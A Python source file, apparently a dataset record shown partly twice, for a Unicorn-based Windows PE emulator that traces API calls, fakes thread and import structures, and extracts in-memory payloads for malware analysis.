lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%06x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT:
#self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
if not self.silent:
print('> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
#return
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
if not self.silent:
print('> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
# Hook and trace syscalls
def hook_syscall(self, instruction, mnemonic, addr, byte):
if self.execution_mode == 'thread':
self.thread_trace.append(addr)
dup_api = {i:self.thread_trace.count(i) for i in self.thread_trace}
for elem in dup_api:
rep = dup_api[elem]
if rep >= self.thread_max_replay:
self.uc.emu_stop()
if self.debug:
print('[!] Thread stoped due to it\'s repetition (infinite loop)')
return
is_ptr = False
if '[' in instruction:
is_ptr = True
try:
if instruction in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + instruction.replace(' ','').upper() + ')')
elif ('+' in instruction or '-' in instruction) and is_ptr:
left_elem = instruction.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = instruction.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = instruction.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
# call/jmp [eax+4]
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
# call/jmp [eax*4 + 10]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
dest_addr = '0x' + instruction.split('0x')[1].replace(']','')
except:
print('[-] Weird call at 0x%08X, investigate me ! "%s %s"' % (addr, mnemonic, instruction))
return
# Are we calling a function from the IAT in a weird way ?
#print(self.IAT)
if str(dest_addr) in self.IAT_hook.values():
target_iat_call = list(self.IAT_hook.keys())[list(self.IAT_hook.values()).index(dest_addr)]
for dll in self.IAT:
for func_addr in self.IAT[dll]:
func_name = self.IAT[dll].get(func_addr)
if func_name == target_iat_call:
#print('[*] IAT call detected:', target_iat_call, func_addr)
dest_addr = func_addr
break
#return
# Is this targeting the IAT or a mapped function ?
api_name_tmp = None
IAT_entry = list(self.raw_IAT.keys())
if dest_addr not in IAT_entry:
if is_ptr:
raw_ptr = self.uc.mem_read(int(dest_addr, 16), 0x4)
ptr = '0x%08x' % struct.unpack('<I', raw_ptr)[0]
if ptr in self.IAT_hook.values():
try:
api_name_tmp = [k for k,v in self.IAT_hook.items() if v == ptr][0]
except:
api_name_tmp = None
else:
if not self.silent:
print('> Tracing intruction ' + hex(addr), ':', mnemonic, self.shortname + '.' + str(instruction) )
print('> Following function ' + self.shortname + '.' + str(instruction) + ':')
if self.trace:
self.calltrace.append(self.shortname + '.' + str(instruction))
return
if api_name_tmp == None:
try:
api_name = self.raw_IAT[dest_addr]
except:
return
else:
api_name = api_name_tmp
is_valid, description, args, args_count = self.extract_API_args(api_name)
if not is_valid:
if self.debug:
print('[!] Unknown call destination, fix me dude')
self.uc.emu_stop()
if is_ptr:
api_name = '&' + api_name
display_line = instruction.replace(dest_addr, api_name)
if not self.silent:
print('> Tracing intruction ' + hex(addr), ':', mnemonic, display_line)
# print('> Tracing intruction ' + hex(addr), ': call', display_line + ' #' + description)
if mnemonic == 'call':
self.fake_syscall(addr, args_count, api_name, byte, 0x0) # Return 0 by default
elif mnemonic == 'jmp':
self.fake_jmpcall(addr, args_count, api_name, byte, 0x0)
# Read <size> bytes from the stack address <start>
def read_stack(self, start, size):
print('=========== Stack Dump ==========')
final_stack = self.uc.mem_read(start, size)
stack_addr = start
for x in range(0, size // 4):
stack_addr += 4
stack_content = final_stack[0:4]
final_stack = final_stack[4:]
stack_value = struct.unpack('I', stack_content)[0]
print('0x%08x : 0x%08x' % (stack_addr, stack_value))
# Fake syscall function
def fake_syscall(self, addr, args_count, api, opcode, ret_value):
api_name = api.replace('&', '')
display = '> ' + hex(addr) + ': ' + api_name + '('
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4*args_count)
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
args.append(hex(value))
# Test weather or not a special hook exist
if api_name in dir(winsyscall):
# This API need to be intercept with a special hardcoded hook
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
# Avoid dead end / infinite loop
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
if self.previous_loop.sort() == self.current_loop.sort():
if self.current_loop_counter == self.max_loop:
print('[!] Inifinite loop detected, stoping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
self.previous_loop = self.current_loop
print(display)
# Does the function return something ?
if ret_code != None:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
# Redirect EIP
original_eip = self.uc.reg_read(UC_X86_REG_EIP)
self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(opcode))
# Pop a value from the stack
def popstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4)
stack_value = struct.unpack('I', val)[0]
return stack_value
# Decrement the stack value
def decstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
self.uc.reg_write(UC_X86_REG_ESP, int(current_esp + 4))
# Read a 4 byte value at a given address
def read_byte(self, addr):
val = self.uc.mem_read(addr, 4)
formated_value = struct.unpack('I', val)[0]
return formated_value
# Fake jmp to syscall ptr
def fake_jmpcall(self, addr, args_count, api, opcode, ret_value):
display = '> ' + hex(addr) + ': ' + api.replace('&', '') + '('
ret = self.popstack()
self.decstack()
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
loc_args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
loc_args.append(hex(value))
# display += str(loc_args).replace('[', '').replace(']', '').replace("'", '') + ''
args = loc_args
api_name = api.replace('&', '')
if api_name in dir(winsyscall):
# This API need to be intercept with a special hardcoded hook
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
# clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
# Avoid dead end / infinite loop
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
if self.previous_loop.sort() == self.current_loop.sort():
if self.current_loop_counter == self.max_loop:
print('[!] Inifinite loop detected, stoping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
self.previous_loop = self.current_loop
print(display)
# Does the function return something ?
if ret_code != None:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
else:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, 0x0)
# Redirect EIP
self.uc.reg_write(UC_X86_REG_EIP, ret)
# Print a list of used handles
def read_handle(self):
print('========= Opened Handles ========')
for h in self.handle:
handle_addr = h
handle_value = self.handle[h][0]
handle_type = self.handle[h][1]
if handle_type == 'dummy':
continue
if len(str(handle_value)) > 50:
handle_value = str(handle_value)[:25] + '[...]' + str(handle_value)[-9:]
print('Address=' + str(handle_addr) + ' Type=' + str(handle_type) + ' Value=' + str(handle_value) )
# Show and extract potentials payloads
def display_extracts(self):
# Search Binary in allocated memory regions
for vmem in self.virtual_memory:
content = self.uc.mem_read(vmem.data_address, vmem.data_size)
if content[:2] == b'MZ':
self.extracts['hmemory_' + hex(vmem.data_address)] = content
print('======= Extracted Payloads =======')
if len(self.extracts) == 0:
print('Nothing found')
return
dirname = './' + self.shortname + '_emu'
if not os.path.exists(dirname):
os.makedirs(dirname)
counter = 0
for entry in self.extracts:
name = entry[1:]
options = ''
data = self.extracts[entry]
if len(str(data)) > 50:
sdata = str(data)[:25] + '[...]' + str(data)[-9:]
else:
sdata = data
if data[:2] == b'MZ' or data[:2] == 'MZ':
options = ' (PE payload detected)'
print('Name="' + name + '" Content="' + sdata + '"' + options)
fname = name.split('\\')[-1]
if fname == '':
fname = 'generic_extract_' + str(counter) + '.bin'
f = open(dirname + '/' + fname, 'wb')
f.write(data)
f.close()
# Print a list of dynamically resolved functions
def read_dynamic_imports(self):
print('========= Dynamic Imports =======')
if len(self.dynamics) == 0x0:
print('No dynamic imports where detected during the emulation')
for i in self.dynamics:
print('Address=', i[0], ' Name=', i[1])
# Print a dump of the current registers
def read_full_regs(self):
print('=== Registers Dump ===')
print('EAX: 0x%08x | EBP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EAX), self.uc.reg_read(UC_X86_REG_EBP)))
print('EBX: 0x%08x | ESP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EBX), self.uc.reg_read(UC_X86_REG_ESP)))
print('ECX: 0x%08x | ESI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_ECX), self.uc.reg_read(UC_X86_REG_ESI)))
print('EDX: 0x%08x | EDI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EDX), self.uc.reg_read(UC_X86_REG_EDI)))
print('EIP: 0x%08x ' % self.uc.reg_read(UC_X86_REG_EIP))
# Retreive the corresponding Windows API in our list
def extract_API_args(self, api_name):
with open(API_refs) as f:
line = next((l for l in f if api_name == l.split(';')[0]), None)
if line == None or line == '':
# We're fucked mate
return False, '', '', 0
name = line.split(';')[0]
description = line.split(';')[1].split(';')[0]
args = line.split(';')[2]
args_count = args.count(',') + 1
if args_count == 1 and args.replace('\n', '').replace(' ','') == '':
args_count = 0
if args == '' or args == None:
# We're double fucked maaaatee
# print('[!] Cannot gather arguments count and type, fix me')
return True, description, '', 0
return True, description, args, args_count
# Setup a fake IAT
def generate_Import_Address_Table(self):
self.IAT = {}
self.raw_IAT = {}
dll_count = 0
functions_count = 0
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
functions = {}
dll_count += 1
for imp in entry.imports:
functions_count += 1
#print(imp.name.decode())
functions[hex(imp.address)] = imp.name.decode()
self.raw_IAT[hex(imp.address)] = imp.name.decode()
self.IAT[entry.dll.lower().decode()] = functions
self.IAT['dynamic_import'] = {'0x00ff0000': 'placeholder_dynamic_import'}
if self.debug:
print('[DEBUG] ' + str(functions_count) + ' functions imported in the IAT from ' + str(dll_count) + ' DLL')
# Setup a hook structure for the IAT
def hook_Import_Address_Table(self):
self.IAT_hook = {}
cnt = 0
for dll in self.IAT:
if dll == 'dynamic_import':
continue
for entry_addr in self.IAT[dll]:
entry = self.IAT[dll][entry_addr]
#self.uc.mem_write(int(entry_addr, 16), bytes([cnt]))
content = self.uc.mem_read(int(entry_addr, 16), 0x4)
value = '0x' + struct.pack("<I", int(bytes(content).hex(), 16)).hex()
self.IAT_hook[entry] = value
cnt += 1
#print(self.IAT_hook)
if self.debug:
print('[DEBUG] ' + str(cnt) + ' IAT entry where hooked')
# Setup the process TIB structure
def generate_Thread_Information_Block(self):
self.TEB_base_addr = 0x200000
self.process_ID = 0x1908
self.thread_ID = 0x10C
self.PEB_base_addr = self.TEB_base_addr + 0x1000
TEB = b''
TEB += struct.pack("<I", 0xffffffff) # FS:[0x00] Structure Exception Handler (SEH)
TEB += struct.pack("<I", (self.stack_addr + self.stack_size)) # FS:[0x04] Stack Base
TEB += struct.pack("<I", self.stack_addr) # FS:[0x08] Stack Limit
TEB += struct.pack("<I", 0x0) # FS:[0x0C] Subsystem TIB
TEB += struct.pack("<I", 0x0) # FS:[0x10] Fiber Data
TEB += struct.pack("<I", 0x0) # FS:[0x14] Arbitrary Data Slot
TEB += struct.pack("<I", self.TEB_base_addr) # FS:[0x18] Linear Address of TEB
TEB += struct.pack("<I", 0x0) # FS:[0x1C] Environment Pointer
TEB += struct.pack("<I", self.process_ID) # FS:[0x20] Process ID
TEB += struct.pack("<I", self.thread_ID) # FS:[0x24] Current Thread ID
TEB += struct.pack("<I", 0x0) # FS:[0x28] Active RPC Handle
TEB += struct.pack("<I", 0x0) # FS:[0x2C] Linear Address of the thread-local storage array
TEB += struct.pack("<I", self.PEB_base_addr) # FS:[0x30] Linear Address of the Process Environment Block (PEB)
page_size=4096
m = 0x5000 % page_size
f = page_size - m
aligned_size = 0x5000 + f
# Map and write the TEB in memory
self.uc.mem_map(self.TEB_base_addr, aligned_size)
self.uc.mem_write(self.TEB_base_addr, TEB)
def launch(self):
# Get header most importants fields
self.header_image_base = self.pe.OPTIONAL_HEADER.ImageBase
self.header_size_of_image = self.pe.OPTIONAL_HEADER.SizeOfImage
self.header_entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
self.mapped_image = self.pe.get_memory_mapped_image(ImageBase=self.header_image_base)
self.mapped_size = (len(self.mapped_image) + 0x1000) & ~0xFFF
self.exit_addr = 0xfffff000
# Redirect to file
if self.out != None:
sys.stdout = open(self.out, "w")
# Get virtual size needed for PE mapping
min_offset = sys.maxsize
virtual_size = 0
for section in self.pe.sections:
min_offset = section.VirtualAddress
virtual_size += min_offset
virtual_size += min_offset
m = virtual_size % 4096
f = 4096 - m
aligned_virtual_size = virtual_size + f
# Map the binary in memory
self.uc.mem_map(self.header_image_base, self.mapped_size)
self.uc.mem_write(self.header_image_base, self.mapped_image)
self.start_addr = self.header_entrypoint + self.header_image_base
if self.debug:
print('[DEBUG] Binary mapped in memory at 0x%08x' % self.header_image_base)
# Initialize the stack
self.stack_addr = 0x0
self.stack_size = 0x200000
self.uc.mem_map(self.stack_addr, self.stack_size)
if self.debug:
print('[DEBUG] Stack of 0x%x bytes starting at 0x%08x' % (self.stack_size, self.stack_addr))
self.uc.reg_write(UC_X86_REG_ESP, self.stack_addr + self.stack_size - 0x500)
self.uc.reg_write(UC_X86_REG_EBP, self.stack_addr + self.stack_size - 0x100)
if self.debug:
print('[DEBUG] Initial stack frame created between 0x%08x and 0x%08x' % (self.stack_size - 0x500, self.stack_size - 0x100))
# Create a the TEB structure
self.generate_Thread_Information_Block()
if self.debug:
print('[DEBUG] Thread Information Block initiated at 0x%08x' % self.TEB_base_addr)
# Create a the PEB structure
# TODO
# Create a fake IAT
self.generate_Import_Address_Table()
# Place hooks on the IAT
self.hook_Import_Address_Table()
# Initiate the registers
self.uc.reg_write(UC_X86_REG_EDI, self.start_addr)
self.uc.reg_write(UC_X86_REG_ESI, self.start_addr)
self.uc.reg_write(UC_X86_REG_EDX, self.start_addr)
self.uc.reg_write(UC_X86_REG_ECX, self.start_addr)
self.uc.reg_write(UC_X86_REG_EBX, self.PEB_base_addr) # EBP point to the PEB address
self.uc.reg_write(UC_X86_REG_EAX, self.TEB_base_addr) # EAX point to the TIB address
# Place a debug hook
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
# Place a memory debug hook
#self.uc.hook_add(UC_ERR_FETCH_UNMAPPED, self.hook_mem_invalid)
# Start emulation
print('[DEBUG] Starting the emulation of "%s.exe" from 0x%08x' % (self.drivename, self.start_addr))
print()
self.uc.emu_start(self.start_addr, self.start_addr + 500000, timeout=20 * UC_SECOND_SCALE)
print()
if len(self.threads) != 0:
uniq_threads = list(dict.fromkeys(self.threads))
else:
uniq_threads = False
if self.debug:
print('[!] Looking for entrypoints in the threads queue')
if uniq_threads:
for thread_addr in uniq_threads:
print('[!] Starting the thread ' + hex(thread_addr))
self.execution_mode = 'thread'
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
self.uc.emu_start(thread_addr, self.start_addr + 100, timeout=20 * UC_SECOND_SCALE)
#self.uc.reg_write(UC_X86_REG_EIP, add)
print('[!] End of the thread ' + hex(thread_addr))
self.thread_trace = []
print()
# Display final program's state
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
if args.dynamics:
self.read_dynamic_imports()
print()
if self.stack:
self.read_stack(final_esp, final_ebp - final_esp)
print()
if self.registers:
self.read_full_regs()
print()
if self.handle_list:
self.read_handle()
print()
if self.show_extract:
self.display_extracts()
print()
if self.trace:
print('==== Call trace ====')
print(' → Entrypoint')
for elem in self.calltrace:
print(' → ' + elem)
if self.out != None:
sys.stdout.close()
def main(args):
emul = Environment(args)
emul.launch()
parser = argparse.ArgumentParser(description='Windows Binary Emulator')
parser.add_argument('-p', '--path', required=True, help='path to the binary file to emulate')
parser.add_argument('-b', '--breakpoint', required=False, help='pause the execution at the given address')
parser.add_argument('--trace', required=False, action="store_true", help='display the call trace of the binary')
parser.add_argument('--dump', required=False, action="store_true", help='display a full dump of the program\'s state after the execution')
parser.add_argument('--stack', required=False, action="store_true", help='display a dump of the stack after the execution')
parser.add_argument('--registers', required=False, action="store_true", help='display a dump of the regsiters after the execution')
parser.add_argument('--debug', required=False, action="store_true", help='display debug messages')
parser.add_argument('--silent', required=False, action="store_true", help='only print out the system calls')
parser.add_argument('--handle', required=False, action="store_true", help='display the list of used handles')
parser.add_argument('--extract', required=False, action="store_true", help='extract potentials payloads found in memory. Files are saved to <bin_name>_emu.out/')
parser.add_argument('--imports', required=False, action="store_true", help='UNIMPLEMENTED - display the static content of the import address table (IAT)')
parser.add_argument('--dynamics', required=False, action="store_true", help='display the list of dynamically resolved syscall')
parser.add_argument('--out', required=False, help='save the emulation output to a file')
args = parser.parse_args()
main(args)
| 43.001304
| 161
| 0.545479
|
from unicorn import *
from unicorn.x86_const import *
from capstone import *
from importlib import import_module
from emulation.syscall import clean_stack
import argparse
import emulation.syscall as winsyscall
import pefile
import struct
import sys
import ast
import os
API_refs = 'winapi_9k.csv'
regs = ['eax', 'ebx', 'ecx', 'edx', 'esp', 'ebp', 'edi', 'esi']
md = Cs(CS_ARCH_X86, CS_MODE_32)
full_content = ''
class Environment:
def __init__(self, args):
self.breakpoint = args.breakpoint
self.trace = args.trace
self.dump = args.dump
self.silent = args.silent
self.out = args.out
self.stack = args.stack
self.registers = args.registers
self.debug = args.debug
self.handle_list = args.handle
self.show_extract = args.extract
self.imports = args.imports
self.dynamics = []
if self.trace:
self.calltrace = []
if self.stack and self.registers:
self.dump = True
if self.dump:
self.registers = True
self.stack = True
path = args.path
self.shortname = path.split('/')[-1].split('.')[0].lower()
self.drivename = 'C:\\Users\\EllenRipley\\Desktop\\' + self.shortname
self.username = 'EllenRipley'
self.computername = 'Nostromo'
self.computer_mac = '0F-0C-95-86-20-29'
self.computer_ip = '192.168.0.12'
self.path = path
self.chunks = []
self.virtual_memory = []
self.resources = {}
self.extracts = {}
self.threads = []
self.thread_ret = None
self.thread_trace = []
self.thread_max_replay = 5
self.max_loop = 10
self.current_loop_counter = 0
self.previous_loop = []
self.current_loop = []
self.execution_mode = 'default'
self.uc = Uc(UC_ARCH_X86, UC_MODE_32)
self.handle = {'0xaa': ['placeholder_dynamic_handle', 'dummy']}
try:
self.pe = pefile.PE(path)
except OSError as e:
print(e)
exit -1
except pefile.PEFormatError as e:
print(f'Malformated or invalid PE file: {e.value}')
exit -1
def hook_code(self, a, address, size, user_data):
instruction = self.uc.mem_read(address, size)
if self.breakpoint:
if hex(address) == self.breakpoint:
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
self.uc.emu_stop()
self.calltrace.append('breakpoint')
print('[+] Breakpoint hits at 0x%08x' % int(self.breakpoint, 16))
return
for i in md.disasm(instruction, address):
if i.mnemonic == 'add' and i.op_str == 'byte ptr [eax], al':
print('[!] End of the main emulation thread')
self.uc.emu_stop()
return
if str(i.mnemonic) == 'call' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT and self.silent:
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'call':
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'jmp' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if i.op_str in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + i.op_str.replace(' ','').upper() + ')')
elif ('+' in i.op_str or '-' in i.op_str or '*' in i.op_str):
left_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = i.op_str.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%08x' % struct.unpack('I', content)[0]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%06x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT:
if not self.silent:
print('> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'jmp', i.address, i.bytes)
else:
if not self.silent:
print('> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
def hook_syscall(self, instruction, mnemonic, addr, byte):
if self.execution_mode == 'thread':
self.thread_trace.append(addr)
dup_api = {i:self.thread_trace.count(i) for i in self.thread_trace}
for elem in dup_api:
rep = dup_api[elem]
if rep >= self.thread_max_replay:
self.uc.emu_stop()
if self.debug:
print('[!] Thread stoped due to it\'s repetition (infinite loop)')
return
is_ptr = False
if '[' in instruction:
is_ptr = True
try:
if instruction in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + instruction.replace(' ','').upper() + ')')
elif ('+' in instruction or '-' in instruction) and is_ptr:
left_elem = instruction.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = instruction.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = instruction.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
# call/jmp [eax+4]
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
# call/jmp [eax*4 + 10]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
lleft_elem = left_elem.split('*')[0].split('-')[0].split('+')[0]
lleft_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + lleft_elem.upper())))
lleft_op = left_elem.replace(lleft_elem, lleft_value)
dest_addr_ptr = '0x%08x' % eval(lleft_op + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
dest_addr = '0x%08x' % struct.unpack('I', content)[0]
else:
print('[-] Something went terribly wrong')
exit(1)
else:
dest_addr = '0x' + instruction.split('0x')[1].replace(']','')
except:
print('[-] Weird call at 0x%08X, investigate me ! "%s %s"' % (addr, mnemonic, instruction))
return
# Are we calling a function from the IAT in a weird way ?
#print(self.IAT)
if str(dest_addr) in self.IAT_hook.values():
target_iat_call = list(self.IAT_hook.keys())[list(self.IAT_hook.values()).index(dest_addr)]
for dll in self.IAT:
for func_addr in self.IAT[dll]:
func_name = self.IAT[dll].get(func_addr)
if func_name == target_iat_call:
#print('[*] IAT call detected:', target_iat_call, func_addr)
dest_addr = func_addr
break
#return
# Is this targeting the IAT or a mapped function ?
api_name_tmp = None
IAT_entry = list(self.raw_IAT.keys())
if dest_addr not in IAT_entry:
if is_ptr:
raw_ptr = self.uc.mem_read(int(dest_addr, 16), 0x4)
ptr = '0x%08x' % struct.unpack('<I', raw_ptr)[0]
if ptr in self.IAT_hook.values():
try:
api_name_tmp = [k for k,v in self.IAT_hook.items() if v == ptr][0]
except:
api_name_tmp = None
else:
if not self.silent:
print('> Tracing intruction ' + hex(addr), ':', mnemonic, self.shortname + '.' + str(instruction) )
print('> Following function ' + self.shortname + '.' + str(instruction) + ':')
if self.trace:
self.calltrace.append(self.shortname + '.' + str(instruction))
return
if api_name_tmp == None:
try:
api_name = self.raw_IAT[dest_addr]
except:
return
else:
api_name = api_name_tmp
is_valid, description, args, args_count = self.extract_API_args(api_name)
if not is_valid:
if self.debug:
print('[!] Unknown call destination, fix me dude')
self.uc.emu_stop()
if is_ptr:
api_name = '&' + api_name
display_line = instruction.replace(dest_addr, api_name)
if not self.silent:
print('> Tracing intruction ' + hex(addr), ':', mnemonic, display_line)
# print('> Tracing intruction ' + hex(addr), ': call', display_line + '
if mnemonic == 'call':
self.fake_syscall(addr, args_count, api_name, byte, 0x0) # Return 0 by default
elif mnemonic == 'jmp':
self.fake_jmpcall(addr, args_count, api_name, byte, 0x0)
# Read <size> bytes from the stack address <start>
def read_stack(self, start, size):
print('=========== Stack Dump ==========')
final_stack = self.uc.mem_read(start, size)
stack_addr = start
for x in range(0, size // 4):
stack_addr += 4
stack_content = final_stack[0:4]
final_stack = final_stack[4:]
stack_value = struct.unpack('I', stack_content)[0]
print('0x%08x : 0x%08x' % (stack_addr, stack_value))
# Fake syscall function
def fake_syscall(self, addr, args_count, api, opcode, ret_value):
api_name = api.replace('&', '')
display = '> ' + hex(addr) + ': ' + api_name + '('
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4*args_count)
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
args.append(hex(value))
# Test weather or not a special hook exist
if api_name in dir(winsyscall):
# This API need to be intercept with a special hardcoded hook
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
# Avoid dead end / infinite loop
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
if self.previous_loop.sort() == self.current_loop.sort():
if self.current_loop_counter == self.max_loop:
print('[!] Inifinite loop detected, stoping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
self.previous_loop = self.current_loop
print(display)
# Does the function return something ?
if ret_code != None:
# Fake return code to 0
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
# Redirect EIP
original_eip = self.uc.reg_read(UC_X86_REG_EIP)
self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(opcode))
# Pop a value from the stack
def popstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
val = self.uc.mem_read(current_esp, 4)
stack_value = struct.unpack('I', val)[0]
return stack_value
# Decrement the stack value
def decstack(self):
current_esp = self.uc.reg_read(UC_X86_REG_ESP)
